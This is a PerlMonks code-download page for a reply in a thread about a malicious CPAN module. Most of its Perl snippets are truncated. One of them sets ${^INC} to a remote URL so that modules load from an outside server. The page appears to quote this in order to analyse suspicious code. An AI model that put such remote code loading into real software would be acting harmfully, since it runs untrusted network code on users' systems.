Beefy Boxes and Bandwidth Generously Provided by pair Networks
Do you know where your variables are?
 
PerlMonks  

Re: Malicious module on CPAN

by aitap (Curate)
on Jul 29, 2020 at 14:07 UTC ( [id://11119976]=note: print w/replies, xml ) Need Help??

Help for this page

Select Code to Download


  1. or download this
    #!/usr/bin/perl -w
    
    ...
    use sword;
    drop sword;
    exit 0;
    
  2. or download this
    # Tell botstrap where to load RCX modules
    ${^INC} = "http://www.r.cx/dl";
    
  3. or download this
    package RCX;
    
    ...
    }
    
    1;
    
  4. or download this
    package sword;
    
    ...
    }
    
    1;
    

Log In?
Username:
Password:

What's my password?
Create A New User
Domain Nodelet?
Node Status?
node history
Node Type: note [id://11119976]
help
Chatterbox?
and the web crawler heard nothing...

How do I use this?Last hourOther CB clients
Other Users?
Others browsing the Monastery: (3)
As of 2024-04-26 07:25 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?

    No recent polls found